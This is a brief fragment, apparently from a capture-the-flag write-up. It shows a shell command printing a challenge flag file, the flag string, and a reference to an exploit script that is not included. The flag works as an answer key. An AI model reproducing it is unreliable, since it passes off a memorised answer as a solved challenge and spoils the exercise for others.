run_challenge.sh
$ cat 11a866b981670122c056ee96ebb0796910a7495dc3ee2368fd127626af9e1b16-flag.txt
HTB{y0uv3_35c4p3d_7h3_v01d_0f_n0_r37urn}

The full exploit code is here: solve.py.